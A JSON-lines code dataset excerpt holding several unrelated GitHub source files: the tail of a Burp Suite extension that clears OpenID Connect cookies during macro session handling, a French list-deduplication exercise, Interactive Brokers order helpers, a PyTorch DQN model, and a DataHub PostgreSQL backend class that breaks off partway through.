https://forum.portswigger.net/thread/macro-clear-cookie-jar-1ee87e563ac65\r\n https://forum.portswigger.net/thread/emptying-cookie-jar-with-new-session-15ed127d\r\n\r\n Combining regexp patterns: https://stackoverflow.com/questions/3040716/python-elegant-way-to-check-if-at-least-one-regex-in-list-matches-a-string/47017995\r\n\"\"\"\r\n# python imports\r\nimport re\r\nimport sys\r\n\r\n# Burp specific imports\r\nfrom burp import IBurpExtender\r\nfrom burp import ISessionHandlingAction\r\nfrom burp import ICookie\r\nimport datetime\r\n\r\n# For using the debugging tools from\r\n# https://github.com/securityMB/burp-exceptions\r\ntry:\r\n from exceptions_fix import FixBurpExceptions\r\nexcept ImportError:\r\n pass\r\n\r\n\r\nclass Cookie(ICookie):\r\n\r\n def getDomain(self):\r\n return self.cookie_domain\r\n\r\n def getPath(self):\r\n return self.cookie_path\r\n\r\n def getExpiration(self):\r\n return self.cookie_expiration\r\n\r\n def getName(self):\r\n return self.cookie_name\r\n\r\n def getValue(self):\r\n return self.cookie_value\r\n\r\n def __init__(self, cookie_domain=None, cookie_name=None, cookie_value=None, cookie_path=None,\r\n cookie_expiration=None):\r\n self.cookie_domain = cookie_domain\r\n self.cookie_name = cookie_name\r\n self.cookie_value = cookie_value\r\n self.cookie_path = cookie_path\r\n self.cookie_expiration = cookie_expiration\r\n\r\n\r\nclass BurpExtender(IBurpExtender, ISessionHandlingAction):\r\n #\r\n # Define config and gui variables\r\n #\r\n cookieName = 'jwt'\r\n cookieDomain = 'dummy.com'\r\n pattern = [\".AspNetCore.Correlation.OpenIdConnect*\",\".AspNetCore.OpenIdConnect.Nonce*\"] #['__Host-*', 'NID*']\r\n cookie_name_list = ['.AspNetCore.Correlation.OpenIdConnect', '.AspNetCore.OpenIdConnect.Nonce.']\r\n domain_list_to_consider = ['\\\\', '\\\\temp']\r\n domain_list_to_ignore = ['\\\\', '\\\\temp']\r\n\r\n combined = \"(\" + \")|(\".join(pattern) + \")\" # Make a regex that matches if any of our regexes match.\r\n\r\n #\r\n # Define some cookie functions\r\n #\r\n # Below function is to remove all matched cookies from cookie jar based on RegEx\r\n def deleteCookie(self):\r\n cookies = self.callbacks.getCookieJarContents()\r\n for cookie in cookies:\r\n # self.stdout.println(\"%s = %s\" % (cookie.getName(), cookie.getValue()))\r\n # if cookie.getDomain() == domain and cookie.getName() == name:\r\n if re.match(self.combined, cookie.getName(), re.IGNORECASE):\r\n cookie_to_be_nuked = Cookie(cookie.getDomain(), cookie.getName(), None, cookie.getPath(),\r\n cookie.getExpiration())\r\n self.callbacks.updateCookieJar(cookie_to_be_nuked)\r\n print(\"[\" + datetime.datetime.now().strftime(\r\n \"%Y-%m-%d %H:%M:%S\") + \"] Cookie '\" + cookie.getName() + \"' nuked for pattern: \" + self.combined)\r\n\r\n # Below function is to remove the matched cookies from cookie jar while ignore the cookies received form the macro/sessionhandling\r\n def deleteCookieFromMacro(self, cookie_whitelist):\r\n cookies = self.callbacks.getCookieJarContents()\r\n for cookie in cookies:\r\n\r\n #use the following condition to skip the validations based on cookie domain name\r\n\r\n #if cookie.getDomain() not in domain_list_to_consider: # Whitelist to scan\r\n if cookie.getDomain() in domain_list_to_ignore: # Blacklist to ignore\r\n continue\r\n\r\n for cookie_name_list in self.cookie_name_list:\r\n print(\"7.Cookie Name: \" + cookie.getName() + \"\\t cookie_name_list: \"+cookie_name_list)\r\n if cookie_name_list in cookie.getName():\r\n #Cookie present in the Burp Cookie Jar\r\n if cookie.getName() not in cookie_whitelist:\r\n cookie_to_be_nuked = Cookie(cookie.getDomain(), cookie.getName(), None, cookie.getPath(),\r\n cookie.getExpiration())\r\n self.callbacks.updateCookieJar(cookie_to_be_nuked)\r\n print(\"[\" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + \"] Cookie nuked: \" + cookie.getName())\r\n\r\n else:\r\n print(\"[\" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + \"] Whitelisted cookie detected: \" + cookie.getName())\r\n #for whitelisted_cookie in cookie_whitelist:\r\n # self.stdout.println(\"%s = %s\" % (cookie.getName(), cookie.getValue()))\r\n # if cookie.getDomain() == domain and cookie.getName() == name:\r\n #if cookie.getName() != whitelisted_cookie:\r\n\r\n\r\n # Below code is to match based on RegEx\r\n # if re.match(self.combined, cookie.getName(), re.IGNORECASE):\r\n # cookie_to_be_nuked = Cookie(cookie.getDomain(), cookie.getName(), None, cookie.getPath(),\r\n # cookie.getExpiration())\r\n # print(\"[\" + datetime.datetime.now().strftime(\r\n # \"%Y-%m-%d %H:%M:%S\") + \"] Cookie '\" + cookie.getName() + \"' nuked for pattern: \" + self.combined)\r\n\r\n\r\n #\r\n # implement IBurpExtender\r\n #\r\n def registerExtenderCallbacks(self, callbacks):\r\n # keep a reference to our callbacks object\r\n self.callbacks = callbacks\r\n\r\n # obtain an extension helpers object\r\n self.helpers = callbacks.getHelpers()\r\n\r\n # set our extension name\r\n callbacks.setExtensionName(\"V9Y - Remove matched cookies - Macro analysis\")\r\n\r\n # register ourselves a Session Handling Action\r\n callbacks.registerSessionHandlingAction(self)\r\n\r\n # Used by the custom debugging tools\r\n sys.stdout = callbacks.getStdout()\r\n\r\n print(\"DEBUG: V9Y - V9Y - Remove matched cookies - Macro analysis - Enabled!\")\r\n\r\n return\r\n\r\n #\r\n # Implement ISessionHandlingAction\r\n #\r\n def getActionName(self):\r\n return \"V9Y - Remove matched cookies - Macro analysis\"\r\n\r\n def performAction(self, current_request, macro_items):\r\n\r\n # self.deleteCookie()\r\n # return\r\n cookie_whitelist = [] # This is to get the list of latest cookies retrieved from macros/session handling rules\r\n print(\"1.Looking for list of macros \")\r\n if len(macro_items) >= 0:\r\n print(\"2.Macro list is >= 0 \\t\\t len(macro_items) >= 0\")\r\n macro_response_info = self.helpers.analyzeResponse(macro_items[0].getResponse())\r\n # get the list of headers from the response, if token is present in the response header then we need to list all the header and extract the value\r\n macro_body_offset = macro_response_info.getHeaders()\r\n\r\n # from the macro body(which contains the response headers), we are extracting dynamic value of the header\r\n new_header = macro_body_offset.get(1)[14:]\r\n\r\n # To list all the headers and iterate one by one to\r\n headers = macro_response_info.getCookies()\r\n head_delete = ''\r\n print(\"3.Going to look for all cookies\")\r\n\r\n for header in headers:\r\n print(\"4.Cookie is: \" + str(header.getName()))\r\n for cookie_name in self.cookie_name_list:\r\n if cookie_name in str(header.getName()):\r\n print(\"5.Value found:\" + cookie_name + \". Adding this cookie to the white list\")\r\n cookie_whitelist.append(str(header.getName()))\r\n # head_delete = header\r\n print(\"6.Cookie enumeration completed. Going to nuke the cookie from cookie jar\")\r\n else:\r\n print(\"The macro list is empty hence removing all matched cookies from cookie jar\")\r\n\r\n self.deleteCookieFromMacro(cookie_whitelist)\r\n\r\n\r\n return\r\n # Below is the actual code and above is the custom code\r\n if len(macro_items) >= 0:\r\n # grab some stuff from the current request\r\n req_text = self.helpers.bytesToString(current_request.getRequest())\r\n\r\n current_macro = macro_items[0]\r\n macro_resp = current_macro.getResponse()\r\n macro_resp_info = self.helpers.analyzeResponse(macro_resp)\r\n\r\n # parse the response & search for jwt\r\n if macro_resp:\r\n macro_resp_body = macro_resp[macro_resp_info.getBodyOffset():]\r\n macro_resp_text = self.helpers.bytesToString(macro_resp_body)\r\n search_re = '\"%s\":\"(.*?)\"' % self.cookieName\r\n search = re.search(search_re, macro_resp_text, re.IGNORECASE)\r\n\r\n # we have a jwt in the macro response\r\n if search:\r\n jwt = search.group(1)\r\n\r\n # set the cookie value in the cookie jar\r\n self.createCookie(self.cookieDomain, self.cookieName, jwt)\r\n\r\n # replace the old token with the stored value\r\n header_replace = \"%s: %s\" % (self.cookieName, jwt)\r\n req_text = re.sub(r\"\\r\\n\" + self.cookieName + \": .*\\r\\n\", \"\\r\\n\" + header_replace + \"\\r\\n\",\r\n req_text)\r\n\r\n # set the current request\r\n current_request.setRequest(self.helpers.stringToBytes(req_text))\r\n\r\n\r\ntry:\r\n FixBurpExceptions()\r\nexcept:\r\n pass\r\n","repo_name":"V9Y1nf0S3C/BurpExtension-DeleteCookies","sub_path":"DeleteCookies_from_list v0.3.py","file_name":"DeleteCookies_from_list v0.3.py","file_ext":"py","file_size_in_byte":10754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31821588429","text":"nb = [5, 3, 1, 5, 4, 4, 2, 3]\n\n\"\"\"On va transformer cette liste en un ensemble, un 'set'. Il s'agit d'un type de données \"built-in\" au même titre que les listes ou les tuples.\nUn 'set' ne comporte pas de doublon et ses éléments ne sont pas repérés par des indices. Les éléments sont considérés comme n'étant pas ordonnés et un 'set' ne peut être trié.\n\"\"\"\nvalues_set = set(nb) # nb_set = {1, 2, 3, 4, 5}\n\n# Maintenant que les doublons ont disparu, revenons à une liste...\nvalues_list = list(values_set)\n\nvalues_list.sort()\n\nprint(\"Liste initiale >>>\", nb)\nprint(\"Liste sans doublon et triée >>>\", values_list)\n","repo_name":"Louis-Gabriel-TM/wf3_poo_en_python","sub_path":"ch10_tp_datatypes/2_tp_lists/exo_10.31alt.py","file_name":"exo_10.31alt.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38364771214","text":"from ibapi.contract import Contract\nfrom ibapi.order import Order\n\n\ndef wse_stock(symbol: str):\n contract = Contract()\n contract.symbol = symbol\n contract.secType = \"STK\"\n contract.exchange = \"WSE\"\n return contract\n\n\ndef nyse_stock(symbol: str):\n contract = Contract()\n contract.symbol = symbol\n contract.secType = \"STK\"\n contract.exchange = \"NYSE\"\n return contract\n\n\ndef market_order(action: str, quantity: float):\n order = Order()\n order.action = action\n order.orderType = \"MKT\"\n order.totalQuantity = quantity\n return order\n\n\ndef stop_order(action: str, quantity: float, stop_price: float):\n order = Order()\n order.action = action\n order.orderType = \"STP\"\n order.totalQuantity = quantity\n order.tif = \"GTC\"\n order.auxPrice = stop_price\n return order\n","repo_name":"quarkfin/qf-lib","sub_path":"qf_lib/brokers/ib_broker/ib_utils.py","file_name":"ib_utils.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":396,"dataset":"github-code","pt":"77"} +{"seq_id":"13235070970","text":"import torch\nimport torch.nn as nn\n\nimport numpy as np\n\n\nclass DQN(nn.Module):\n def __init__(self, input_shape, num_actions):\n super(DQN, self).__init__()\n\n # Convolution layer\n self.conv_layers = nn.Sequential(\n nn.Conv2d(input_shape[0], 32, kernel_size=8, stride=4),\n nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n # Compute output shape of layer to pass into fully connected layer\n conv_out_size = self._get_conv_out(input_shape)\n self.fc_layers = nn.Sequential(\n nn.Linear(conv_out_size, 512),\n nn.ReLU(),\n nn.Linear(512, num_actions)\n )\n\n def _get_conv_out(self, shape):\n out = self.conv_layers(torch.zeros(1, *shape))\n return int(np.prod(out.size()))\n\n def forward(self, inputs):\n conv_out = self.conv_layers(inputs).view(inputs.size()[0], -1)\n return self.fc_layers(conv_out)\n\n def __call__(self, inputs):\n return self.forward(inputs)\n","repo_name":"alik-git/Pong-DQN","sub_path":"utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"27547003459","text":"import re\nimport os\nimport errno\nimport shutil\nimport hashlib\nfrom collections import namedtuple\nfrom uuid import uuid4\nimport psycopg2\nimport core.db.query_rewriter\nfrom psycopg2.extensions import AsIs\nfrom psycopg2.pool import ThreadedConnectionPool\nfrom psycopg2 import errorcodes\nfrom core.db.licensemanager import LicenseManager\n\nfrom core.db.errors import PermissionDenied\nfrom config import settings\n\n\"\"\"\nDataHub internal APIs for postgres repo_base\n\"\"\"\nHOST = settings.DATABASES['default']['HOST']\nPORT = 5432\n\nif settings.DATABASES['default']['PORT'] != '':\n try:\n PORT = int(settings.DATABASES['default']['PORT'])\n except:\n pass\n\n# Maintain a separate db connection pool for each (user, password, database)\n# tuple.\nconnection_pools = {}\nPoolKey = namedtuple('PoolKey', 'user, password, repo_base')\n\n\ndef _pool_for_credentials(user, password, repo_base, create_if_missing=True):\n pool_key = PoolKey(user, password, repo_base)\n # Create a new pool if one doesn't exist or if the existing one has been\n # closed. Normally a pool should only be closed during testing, to force\n # all hanging connections to a database to be closed.\n if pool_key not in connection_pools or connection_pools[pool_key].closed:\n if create_if_missing is False:\n return None\n # Maintains at least 1 connection.\n # Raises \"PoolError: connection pool exausted\" if a thread tries\n # holding onto than 10 connections to a single database.\n connection_pools[pool_key] = ThreadedConnectionPool(\n 0,\n 10,\n user=user,\n password=password,\n host=HOST,\n port=PORT,\n database=repo_base)\n return connection_pools[pool_key]\n\n\ndef _close_all_connections(repo_base):\n for key, pool in connection_pools.iteritems():\n if repo_base == key.repo_base and not pool.closed:\n pool.closeall()\n\n\ndef _convert_pg_exception(e):\n # Convert some psycopg2 errors into exceptions meaningful to\n # Django.\n if (e.pgcode == errorcodes.INSUFFICIENT_PRIVILEGE):\n raise PermissionDenied()\n if (e.pgcode == errorcodes.INVALID_PARAMETER_VALUE or\n e.pgcode == errorcodes.UNDEFINED_OBJECT):\n raise ValueError(\"Invalid parameter in query.\")\n if e.pgcode == errorcodes.INVALID_SCHEMA_NAME:\n error = ('Repo not found. '\n 'You must specify a repo in your query. '\n 'i.e. select * from REPO_NAME.TABLE_NAME. ')\n raise LookupError(error)\n if e.pgcode == errorcodes.UNDEFINED_TABLE:\n raise LookupError(\"Table or view not found.\")\n if e.pgcode == errorcodes.DUPLICATE_SCHEMA:\n raise ValueError(\"A repo with that name already exists.\")\n if e.pgcode == errorcodes.DUPLICATE_TABLE:\n raise ValueError(\"A table with that name already exists.\")\n raise e\n\n\nclass PGBackend:\n\n def __init__(self, user, password, host=HOST, port=PORT, repo_base=None):\n self.user = user\n self.password = password\n self.host = host\n self.port = port\n self.repo_base = repo_base\n self.connection = None\n\n # row level security is enabled unless the user is a superuser\n self.row_level_security = bool(\n user != settings.DATABASES['default']['USER'])\n\n # We only need a query rewriter if RLS is enabled\n if self.row_level_security:\n self.query_rewriter = core.db.query_rewriter.SQLQueryRewriter(\n self.repo_base, self.user)\n\n self.__open_connection__()\n\n def __del__(self):\n self.close_connection()\n\n def __open_connection__(self):\n pool = _pool_for_credentials(self.user, self.password, self.repo_base)\n self.connection = pool.getconn()\n self.connection.set_isolation_level(\n psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n\n def change_repo_base(self, repo_base):\n self.close_connection()\n self.repo_base = repo_base\n self.__open_connection__()\n\n def close_connection(self):\n pool = _pool_for_credentials(self.user, self.password, self.repo_base,\n create_if_missing=False)\n if self.connection and pool and not pool.closed:\n pool.putconn(self.connection, close=True)\n self.connection = None\n\n def _check_for_injections(self, noun):\n \"\"\"\n Raises ValueError if the proposed noun is invalid.\n\n Valid nouns contain only alphanumeric characters and underscores, and\n must not begin or end with an underscore.\n \"\"\"\n invalid_noun_msg = (\n \"Usernames and repo names may only contain \"\n \"alphanumeric characters and underscores, must begin with a \"\n \"letter, and must not begin or end with an underscore.\"\n )\n\n regex = r'^(?![\\_\\d])[\\w\\_]+(? 0)\n\n def database_exists(self, db_name):\n query = \"SELECT 1 FROM pg_database WHERE datname=%s\"\n params = (db_name,)\n result = self.execute_sql(query, params)\n return (result['row_count'] > 0)\n\n def create_user(self, username, password, create_db=True):\n self._check_for_injections(username)\n\n query = ('CREATE ROLE %s WITH LOGIN '\n 'NOCREATEDB NOCREATEROLE NOCREATEUSER PASSWORD %s')\n params = (AsIs(username), password)\n self.execute_sql(query, params)\n\n # Don't do this in the case of the public user.\n if username != settings.PUBLIC_ROLE:\n query = ('GRANT %s to %s')\n params = (AsIs(settings.PUBLIC_ROLE), AsIs(username))\n self.execute_sql(query, params)\n\n if create_db:\n return self.create_user_database(username)\n\n def create_user_database(self, username):\n # lines need to be executed seperately because\n # \"CREATE DATABASE cannot be executed from a\n # function or multi-command string\"\n self._check_for_injections(username)\n\n query = 'CREATE DATABASE %s; '\n params = (AsIs(username),)\n self.execute_sql(query, params)\n\n query = 'ALTER DATABASE %s OWNER TO %s; '\n params = (AsIs(username), AsIs(username))\n return self.execute_sql(query, params)\n\n def remove_user(self, username):\n self._check_for_injections(username)\n\n query = 'DROP ROLE %s;'\n params = (AsIs(username),)\n return self.execute_sql(query, params)\n\n def drop_owned_by(self, username):\n self._check_for_injections(username)\n query = 'DROP OWNED BY %s CASCADE;' % (username)\n params = (AsIs(username), )\n return self.execute_sql(query, params)\n\n def list_all_users(self):\n query = 'SELECT usename FROM pg_catalog.pg_user WHERE usename != %s'\n params = (self.user,)\n res = self.execute_sql(query, params)\n user_tuples = res['tuples']\n\n all_users_list = []\n for user_tuple in user_tuples:\n all_users_list.append(user_tuple[0])\n\n return all_users_list\n\n def list_all_databases(self):\n query = ('SELECT datname FROM pg_database where datname NOT IN '\n ' (%s, \\'template1\\', \\'template0\\', '\n ' \\'datahub\\', \\'test_datahub\\', \\'postgres\\');'\n )\n params = (self.user, )\n res = self.execute_sql(query, params)\n db_tuples = res['tuples']\n\n all_db_list = []\n for db_tuple in db_tuples:\n all_db_list.append(db_tuple[0])\n\n return all_db_list\n\n def remove_database(self, database, revoke_collaborators=True):\n self._check_for_injections(database)\n\n # remove collaborator access to the database\n if revoke_collaborators:\n all_users = self.list_all_users()\n\n for user in all_users:\n query = \"REVOKE ALL ON DATABASE %s FROM %s;\"\n params = (AsIs(database), AsIs(user))\n self.execute_sql(query, params)\n\n # Make sure to close all extant connections to this database or the\n # drop will fail.\n _close_all_connections(database)\n\n # drop database\n query = 'DROP DATABASE %s;'\n params = (AsIs(database),)\n try:\n return self.execute_sql(query, params)\n except psycopg2.ProgrammingError as e:\n print(e)\n print('this probably happened because the postgres role'\n 'exists, but a database of the same name does not.')\n\n def change_password(self, username, password):\n self._check_for_injections(username)\n query = 'ALTER ROLE %s WITH PASSWORD %s;'\n params = (AsIs(username), password)\n return self.execute_sql(query, params)\n\n def list_collaborators(self, repo):\n query = 'SELECT unnest(nspacl) FROM pg_namespace WHERE nspname=%s;'\n params = (repo, )\n res = self.execute_sql(query, params)\n\n # postgres privileges\n # r -- SELECT (\"read\")\n # w -- UPDATE (\"write\")\n # a -- INSERT (\"append\")\n # d -- DELETE\n # D -- TRUNCATE\n # x -- REFERENCES\n # t -- TRIGGER\n # X -- EXECUTE\n # U -- USAGE\n # C -- CREATE\n # c -- CONNECT\n # T -- TEMPORARY\n # arwdDxt -- ALL PRIVILEGES (for tables, varies for other objects)\n # * -- grant option for preceding privilege\n # /yyyy -- role that granted this privilege\n\n collaborators = []\n for row in res['tuples']:\n # for reference, rows look like this:\n # ('username=UC/repo_base',)\n\n collab_obj = {}\n username = row[0].split('=')[0].strip()\n permissions = row[0].split('=')[1].split('/')[0]\n\n collab_obj['username'] = username\n collab_obj['db_permissions'] = permissions\n\n collaborators.append(collab_obj)\n\n return collaborators\n\n def has_base_privilege(self, login, privilege):\n \"\"\"\n returns True or False for whether the user has privileges for the\n repo_base (database)\n \"\"\"\n query = 'SELECT has_database_privilege(%s, %s);'\n params = (login, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def has_repo_db_privilege(self, login, repo, privilege):\n \"\"\"\n returns True or False for whether the use has privileges for the\n repo (schema)\n \"\"\"\n query = 'SELECT has_schema_privilege(%s, %s, %s);'\n params = (login, repo, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def has_table_privilege(self, login, table, privilege):\n query = 'SELECT has_table_privilege(%s, %s, %s);'\n params = (login, table, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def has_column_privilege(self, login, table, column, privilege):\n query = 'SELECT has_column_privilege(%s, %s, %s, %s);'\n params = (login, table, column, privilege)\n res = self.execute_sql(query, params)\n return res['tuples'][0][0]\n\n def export_table(self, table_name, file_path, file_format='CSV',\n delimiter=',', header=True):\n words = table_name.split('.')\n for word in words[:-1]:\n self._check_for_injections(word)\n self._validate_table_name(words[-1])\n\n self._check_for_injections(file_format)\n\n query = 'SELECT * FROM %s' % table_name\n self.export_query(\n query,\n file_path,\n file_format=file_format,\n delimiter=delimiter,\n header=header)\n\n def export_view(self, view_name, file_path, file_format='CSV',\n delimiter=',', header=True):\n words = view_name.split('.')\n for word in words[:-1]:\n self._check_for_injections(word)\n self._validate_table_name(words[-1])\n\n self._check_for_injections(file_format)\n\n query = 'SELECT * FROM %s' % view_name\n self.export_query(\n query,\n file_path,\n file_format=file_format,\n delimiter=delimiter,\n header=header)\n\n def export_query(self, query, file_path, file_format='CSV',\n delimiter=',', header=True):\n \"\"\"\n Runs a query as the current user and saves the result to a file.\n\n query can be a sql query or table reference.\n \"\"\"\n header_option = 'HEADER' if header else ''\n query = query.split(';')[0].strip()\n\n self._check_for_injections(file_format)\n self._check_for_injections(header_option)\n\n meta_query = 'COPY (%s) TO STDOUT WITH %s %s DELIMITER %s;'\n params = (AsIs(query), AsIs(file_format),\n AsIs(header_option), delimiter)\n\n cur = self.connection.cursor()\n query = cur.mogrify(meta_query, params)\n\n # Store pending exports in a temporary location so they're aren't\n # discoverable while being exported.\n tmp_path = '/tmp/user_exports/{0}-{1}'.format(\n uuid4().hex, hashlib.sha256(query).hexdigest())\n try:\n os.makedirs('/tmp/user_exports')\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise e\n\n try:\n with open(tmp_path, 'w') as f:\n cur.copy_expert(query, f)\n except psycopg2.Error as e:\n # Delete the temporary files of failed exports.\n os.remove(tmp_path)\n _convert_pg_exception(e)\n finally:\n cur.close()\n # Move successful exports into the user's data folder.\n # os.rename() would fail here if /tmp and /user_data are stored on\n # different filesystems, so use shutil.move() instead.\n shutil.move(tmp_path, file_path)\n\n def import_file(self, table_name, file_path, file_format='CSV',\n delimiter=',', header=True, encoding='ISO-8859-1',\n quote_character='\"'):\n\n header_option = 'HEADER' if header else ''\n\n words = table_name.split('.')\n for word in words[:-1]:\n self._check_for_injections(word)\n self._validate_table_name(words[-1])\n self._check_for_injections(file_format)\n\n query = 'COPY %s FROM %s WITH %s %s DELIMITER %s ENCODING %s QUOTE %s;'\n params = (AsIs(table_name), file_path, AsIs(file_format),\n AsIs(header_option), delimiter, encoding, quote_character)\n try:\n self.execute_sql(query, params)\n except Exception as e:\n self.execute_sql('DROP TABLE IF EXISTS %s', (AsIs(table_name),))\n raise ImportError(e)\n\n # Try importing using dbtruck. Was never enabled by anant.\n # RogerTangos 2015-12-09\n # return self.import_file_w_dbtruck(table_name, file_path)\n\n def import_rows(self, repo, table, rows, delimiter=',', header=False):\n # if there was a header, remove it\n if header:\n rows = rows[1:len(rows)]\n\n query = 'INSERT INTO %s.%s values '\n params = [AsIs(repo), AsIs(table)]\n\n # prepare query\n all_row_array = []\n for row in rows:\n\n # split the string into an array\n row = row.split(delimiter)\n\n # add the objects to params\n params += row\n\n # turn every item in the array into a %s\n # and make a string out of it\n row_array = ['%s' for c in row]\n row_array = ', '.join(row_array)\n row_array = '(' + row_array + ')'\n\n all_row_array.append(row_array)\n\n all_row_string = ', '.join(all_row_array)\n\n # finalize the query and params\n query += all_row_string\n params = tuple(params)\n\n res = self.execute_sql(query, params)\n return res['status']\n\n def import_file_w_dbtruck(self, table_name, file_path):\n # dbtruck is not tested for safety. At all. It's currently disabled\n # in the project RogerTangos 2015-12-09\n from dbtruck.dbtruck import import_datafiles\n # from dbtruck.util import get_logger\n from dbtruck.exporters.pg import PGMethods\n\n dbsettings = {\n 'dbname': self.repo_base,\n 'hostname': self.host,\n 'username': self.user,\n 'password': self.password,\n 'port': self.port,\n }\n\n create_new = True\n errfile = None\n\n return import_datafiles([file_path], create_new, table_name, errfile,\n PGMethods, **dbsettings)\n # Methods for Licenses\n\n def create_license_schema(self):\n public_role = settings.PUBLIC_ROLE\n schema = settings.LICENSE_SCHEMA\n self._check_for_injections(public_role)\n self._check_for_injections(schema)\n query = 'CREATE SCHEMA IF NOT EXISTS %s AUTHORIZATION %s'\n params = (AsIs(schema), AsIs(public_role))\n\n return self.execute_sql(query, params)\n\n def create_license_table(self):\n schema = settings.LICENSE_SCHEMA\n table = settings.LICENSE_TABLE\n public_role = settings.PUBLIC_ROLE\n\n self._check_for_injections(schema)\n self._validate_table_name(table)\n self._check_for_injections(public_role)\n\n query = ('CREATE TABLE IF NOT EXISTS %s.%s'\n '(license_id serial primary key,'\n 'license_name VARCHAR(40),'\n 'pii_def VARCHAR(100) NOT NULL,'\n 'pii_removed boolean NOT NULL,'\n 'pii_anonymized boolean NOT NULL);')\n params = (AsIs(schema), AsIs(table))\n self.execute_sql(query, params)\n\n # grant the public role access to the table\n query = ('GRANT ALL ON %s.%s to %s;')\n params = (AsIs(schema), AsIs(table), AsIs(public_role))\n\n return self.execute_sql(query, params)\n\n def create_license_link_table(self):\n schema = settings.LICENSE_LINK_SCHEMA\n table = settings.LICENSE_LINK_TABLE\n public_role = settings.PUBLIC_ROLE\n\n self._check_for_injections(schema)\n self._validate_table_name(table)\n self._check_for_injections(public_role)\n\n query = ('CREATE TABLE IF NOT EXISTS %s.%s '\n '(license_link_id serial primary key,'\n 'repo_base VARCHAR(40) NOT NULL,'\n 'repo VARCHAR(40) NOT NULL,'\n 'license_id integer NOT NULL);')\n params = (AsIs(schema), AsIs(table))\n self.execute_sql(query, params)\n\n query = ('GRANT ALL ON %s.%s to %s;')\n params = (AsIs(schema), AsIs(table), AsIs(public_role))\n\n return self.execute_sql(query, params)\n\n def create_license(\n self, license_name, pii_def, pii_anonymized, pii_removed):\n '''\n Creates a new license\n '''\n query = (\n 'INSERT INTO dh_public.license '\n '(license_name, pii_def, pii_anonymized, pii_removed) '\n 'values (%s, %s, %s, %s)')\n params = (license_name, pii_def, pii_anonymized, pii_removed)\n\n res = self.execute_sql(query, params)\n\n return res['status']\n\n def create_license_link(self, repo_base, repo, license_id):\n '''\n Creates a new license\n '''\n\n # check if link already exists\n query = ('SELECT license_link_id, repo_base, repo, license_id '\n 'FROM %s.%s where '\n 'repo_base = %s and repo = %s and license_id = %s;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_LINK_TABLE),\n repo_base, repo, license_id)\n\n res = self.execute_sql(query, params)\n\n if res['tuples']:\n return res['status']\n\n query = (\n 'INSERT INTO dh_public.license_link '\n '(repo_base, repo, license_id) '\n 'values (%s, %s, %s)')\n params = (repo_base, repo, license_id)\n\n res = self.execute_sql(query, params)\n\n return res['status']\n\n def find_license_links(self, license_id):\n '''\n finds all license_links associated with a given license_id\n '''\n query = ('SELECT license_link_id, repo_base, repo, license_id '\n 'FROM %s.%s ;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_LINK_TABLE))\n res = self.execute_sql(query, params)\n\n if not res['tuples']:\n return []\n\n return res['tuples']\n\n def find_license_links_by_repo(self, repo_base, repo):\n query = ('SELECT license_link_id, repo_base, repo, license_id '\n 'FROM %s.%s where repo_base = %s and repo = %s;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_LINK_TABLE),\n repo_base, repo)\n res = self.execute_sql(query, params)\n\n if not res['tuples']:\n return []\n\n return res['tuples']\n\n def find_licenses(self):\n '''\n find all licenses\n '''\n query = (\n 'SELECT license_id, license_name, pii_def, '\n 'pii_anonymized, pii_removed FROM %s.%s;')\n params = (AsIs(settings.LICENSE_SCHEMA), AsIs(settings.LICENSE_TABLE))\n\n res = self.execute_sql(query, params)\n return res['tuples']\n\n def find_license_by_id(self, license_id):\n query = (\n 'SELECT license_id, license_name, pii_def, '\n 'pii_anonymized, pii_removed '\n 'FROM %s.%s where license_id= %s;')\n params = (\n AsIs(settings.LICENSE_SCHEMA),\n AsIs(settings.LICENSE_TABLE),\n license_id)\n\n res = self.execute_sql(query, params)\n\n # return None if the list is empty\n if not res['tuples']:\n return None\n\n # else, return the policy\n return res['tuples'][0]\n\n # Below methods can only be called from the RLSSecurityManager #\n\n def create_security_policy_schema(self):\n public_role = settings.PUBLIC_ROLE\n schema = settings.POLICY_SCHEMA\n self._check_for_injections(public_role)\n self._check_for_injections(schema)\n\n query = 'CREATE SCHEMA IF NOT EXISTS %s AUTHORIZATION %s'\n params = (AsIs(schema), AsIs(public_role))\n return self.execute_sql(query, params)\n\n def create_security_policy_table(self):\n schema = settings.POLICY_SCHEMA\n table = settings.POLICY_TABLE\n public_role = settings.PUBLIC_ROLE\n\n self._check_for_injections(schema)\n self._validate_table_name(table)\n self._check_for_injections(public_role)\n\n query = ('CREATE TABLE IF NOT EXISTS %s.%s'\n '('\n 'policy_id serial primary key,'\n 'policy VARCHAR(80) NOT NULL,'\n 'policy_type VARCHAR(80) NOT NULL,'\n 'grantee VARCHAR(80) NOT NULL,'\n 'grantor VARCHAR(80) NOT NULL,'\n 'table_name VARCHAR(80) NOT NULL,'\n 'repo VARCHAR(80) NOT NULL,'\n 'repo_base VARCHAR(80) NOT NULL'\n ');')\n params = (AsIs(schema), AsIs(table))\n self.execute_sql(query, params)\n\n # create indexes for faster seraching\n query = ('create index grantee_index on '\n 'dh_public.policy using hash(grantee); '\n\n 'create index grantor_index on '\n 'dh_public.policy using hash(grantor); '\n\n 'create index table_name_index on '\n 'dh_public.policy using hash(table_name); '\n\n 'create index repo_index on '\n 'dh_public.policy using hash(repo); '\n\n 'create index repo_base_index on '\n 'dh_public.policy using hash(repo_base);')\n\n # postgres 9.4 doesn't support IF 